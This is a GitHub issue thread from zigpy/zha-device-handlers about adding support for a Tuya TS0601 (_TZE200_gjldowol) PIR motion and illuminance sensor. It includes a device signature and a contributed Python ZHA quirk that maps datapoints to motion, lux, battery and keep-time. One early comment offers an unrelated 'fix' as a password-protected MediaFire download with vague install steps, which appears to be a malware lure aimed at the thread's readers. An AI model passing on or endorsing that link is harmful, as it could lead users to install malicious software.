zigpy/zha-device-handlers #3322: [Device Support Request] TS0601 by TZE200_gjldowol

birupesh, 2024-08-27:
### Problem description

Supposed to be simple PIR motion + luminance sensor.

paired with a zigbee coordinator onto home assistant but doesnt show any entities.

### Solution description

Would like to make sure of the motion detections and lux sensor

### Screenshots/Video

<details><summary>Screenshots/Video</summary>

[Paste/upload your media here]

</details>

### Device signature

<details><summary>Device signature</summary>

```json
[Paste the device signature here]
```

</details>

### Diagnostic information

<details><summary>Diagnostic information</summary>

```json
[Paste the diagnostic information here]
```

</details>

### Logs

<details><summary>Logs</summary>

```python
[Paste the logs here]
```

</details>

### Custom quirk

<details><summary>Custom quirk</summary>

```python
[Paste your custom quirk here]
```

</details>

ahmar7, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

vlkazakov, 2024-09-23:
Сan anyone help?

timot77, 2024-09-24:
**Here is the device signature**:

```json
{
  "node_descriptor": {
    "logical_type": 2,
    "complex_descriptor_available": 0,
    "user_descriptor_available": 0,
    "reserved": 0,
    "aps_flags": 0,
    "frequency_band": 8,
    "mac_capability_flags": 128,
    "manufacturer_code": 4417,
    "maximum_buffer_size": 66,
    "maximum_incoming_transfer_size": 66,
    "server_mask": 10752,
    "maximum_outgoing_transfer_size": 66,
    "descriptor_capability_field": 0
  },
  "endpoints": {
    "1": {
      "profile_id": "0x0104",
      "device_type": "0x000c",
      "input_clusters": [
        "0x0000",
        "0xef00"
      ],
      "output_clusters": [
        "0x000a",
        "0x0019"
      ]
    }
  },
  "manufacturer": "_TZE200_gjldowol",
  "model": "TS0601",
  "class": "zigpy.device.Device"
}
```

MakAndJo, 2024-12-17:
Same device here with same signature. It pairs with zha but no entities inside

MakAndJo, 2024-12-20:
I found datapoints 101 and 102 for that and get some luck with `keep_time` setting, but still no success with `sensitivity` idw 🤷‍♂️
datapoint 9 on `0xFE09` is not giving me any changes in real life senstitivity

MakAndJo, 2024-12-20:
So i made it like this. There is working motion alarm, illuminance, battery level and setting keep time, but still no luck with `illuminance_interval` and `sesitivity`. Can anyone help?

```py
import math
from typing import Dict

from zigpy.profiles import zha
from zigpy.quirks import CustomDevice
import zigpy.types as t
from zigpy.zcl.clusters.general import Basic, Ota, Time
from zigpy.zcl.clusters.measurement import IlluminanceMeasurement, OccupancySensing
from zigpy.zcl.clusters.security import IasZone

from zhaquirks.const import (
    DEVICE_TYPE,
    ENDPOINTS,
    INPUT_CLUSTERS,
    MODELS_INFO,
    OUTPUT_CLUSTERS,
    PROFILE_ID,
    ZONE_TYPE,
)
from zhaquirks.tuya import TuyaLocalCluster
from zhaquirks.tuya.mcu import (
    DPToAttributeMapping,
    TuyaMCUCluster,
    TuyaPowerConfigurationCluster,
)

class IlluminanceInterval(t.enum16):
    """Illuminance interval enum."""

    SECOND = 0x01
    MINUTE = 0x3c
    TWO_MINUTE = 0x78
    THREE_MINUTE = 0xb4
    FIVE_MINUTE = 0x12c
    TEN_MINUTE = 0x258
    TWELVE_MINUTE = 0x2d0

class TuyaIlluminanceMeasurement(IlluminanceMeasurement, TuyaLocalCluster):
    """Tuya local IlluminanceMeasurement cluster."""

class SensitivityLevel(t.enum8):
    """Sensitivity level enum."""

    LOW = 0x00
    MEDIUM = 0x01
    HIGH = 0x02

class OnTimeValues(t.enum8):
    """Time on value enum."""

    _05_SEC = 0x05
    _10_SEC = 0x0a
    _15_SEC = 0x0f
    _30_SEC = 0x1e
    _45_SEC = 0x2d
    _60_SEC = 0x3c
    _120_SEC = 0x78

class MotionSensorCluster(IasZone, TuyaLocalCluster):
    """Tuya Motion_Sensor Sensor."""

    _CONSTANT_ATTRIBUTES = {ZONE_TYPE: IasZone.ZoneType.Motion_Sensor}

class PirMotionManufCluster(TuyaMCUCluster):
    """Neo manufacturer cluster."""

    attributes = TuyaMCUCluster.attributes.copy()
    attributes.update({0xEF09: ("sensitivity_level", SensitivityLevel)})
    attributes.update({0xEF65: ("illuminance_interval", OnTimeValues)})
    attributes.update({0xEF66: ("keep_time", OnTimeValues)})

    dp_to_attribute: Dict[int, DPToAttributeMapping] = {
        1: DPToAttributeMapping(
            MotionSensorCluster.ep_attribute,
            "zone_status",

            converter=lambda x: IasZone.ZoneStatus.Alarm_1 if not x else 0,
        ),
        4: DPToAttributeMapping(
            TuyaPowerConfigurationCluster.ep_attribute,
            "battery_percentage_remaining",

        ),
        9: DPToAttributeMapping(
            TuyaMCUCluster.ep_attribute,
            "sensitivity_level",
            converter=lambda x: SensitivityLevel(x),
        ),
        12: DPToAttributeMapping(
            TuyaIlluminanceMeasurement.ep_attribute,
            "measured_value",

            converter=lambda x: (10000 * math.log10(x) + 3000) / 1,
        ),
        101: DPToAttributeMapping(
            TuyaMCUCluster.ep_attribute,
            "illuminance_interval",

            converter=lambda x: IlluminanceInterval(x),
        ),
        102: DPToAttributeMapping(
            TuyaMCUCluster.ep_attribute,
            "keep_time",

            converter=lambda x: OnTimeValues(x),
        ),
    }

    data_point_handlers = {
        1: "_dp_2_attr_update",
        4: "_dp_2_attr_update",
        9: "_dp_2_attr_update",
        12: "_dp_2_attr_update",
        101: "_dp_2_attr_update",
        102: "_dp_2_attr_update",
    }

class PirMotion(CustomDevice):
    """Tuya PIR motion sensor."""

    signature = {
        MODELS_INFO: [("_TZE200_gjldowol", "TS0601")],
        ENDPOINTS: {
            1: {
                PROFILE_ID: 0x0104,
                DEVICE_TYPE: 0x000c,
                INPUT_CLUSTERS: [
                    0x0000,
                    0xef00,
                ],
                OUTPUT_CLUSTERS: [
                    Time.cluster_id,
                    Ota.cluster_id,
                ],
            }
        },
    }

    replacement = {
        ENDPOINTS: {
            1: {
                PROFILE_ID: zha.PROFILE_ID,
                DEVICE_TYPE: zha.DeviceType.IAS_ZONE,
                INPUT_CLUSTERS: [
                    Basic.cluster_id,
                    TuyaPowerConfigurationCluster,
                    PirMotionManufCluster,
                    MotionSensorCluster,
                    TuyaIlluminanceMeasurement,
                ],
                OUTPUT_CLUSTERS: [
                    Time.cluster_id,
                    Ota.cluster_id,
                ],
            }
        }
    }
```

timot77, 2025-01-09:
Thank you @MakAndJo for this quirk, I have tried it and the motion sensor as well as the illuminance sensor seems to work well. 
I sometimes have some disconnection from those devices but i haven't even had the time to debug it and have other devices with the same behaviour so it's probably my setup...
Looking forward to find some time to learn a bit more and be able to give you a hand on this.

closed 2025-01-20 by TheJulianJES